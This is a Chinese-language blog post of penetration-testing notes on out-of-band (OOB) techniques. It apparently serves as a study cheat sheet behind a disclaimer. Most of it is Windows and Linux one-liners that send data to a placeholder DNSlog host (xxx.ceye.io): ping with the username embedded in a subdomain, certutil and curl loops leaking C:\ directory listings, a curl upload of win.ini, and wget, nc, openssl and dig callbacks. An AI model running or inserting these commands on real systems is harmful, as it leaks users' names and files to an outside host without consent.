学习笔记-OOB

OOB


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


相关文章

在线监控平台

相关工具

  • uknowsec/SharpNetCheck - 该工具可以在 dnslog 中回显内网 ip 地址和计算机名,可实现内网中的快速定位可出网机器
  • ztgrace/mole - 识别和利用out-of-band (OOB)漏洞的burp扩展

平台搭建

平台


Windows

  • ping

    ping %USERNAME%.xxx.ceye.io
    
    ping -nc 4 %USERNAME%.xxx.ceye.io
    
  • certutil

    使用 certutil 请求证书文件,并将下载文件重定向到 nul,无缓存、无需浏览器实现发起 http 请求

    for /F %x in ('dir /b c:\') do certutil -urlcache -split -f "http://xxx.ceye.io/?result=%x" nul
    
  • curl

    windows 环境默认是支持 curl 的

    for /F %x in ('dir /b c:\') do curl http://xxx.ceye.io/%x
    
    curl -F file=@C:\windows\win.ini http://xxx.ceye.io
    

linux

  • curl

    curl http://xxx.ceye.io/%x
    
  • wget

    wget http://xxx.ceye.io/%x
    
  • ping

    linux 默认 ping 不带 -c 参数是会导致无限ping下去的,一定要带 -c

    ping -c 4 xxx.ceye.io
    
    ping -nc 4 xxx.ceye.io
    
  • openssl

    openssl s_client -connect xxx.ceye.io:80
    
  • nc

    echo -e "GET / HTTP/1.1\nHost: http://xxx.ceye.io/%x\n\n" | nc xxx.ceye.io 80
    
  • dig

    dig xxx.ceye.io
    

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

posted @ 2022-11-02 15:31  syscallwww  阅读(82)  评论(0编辑  收藏  举报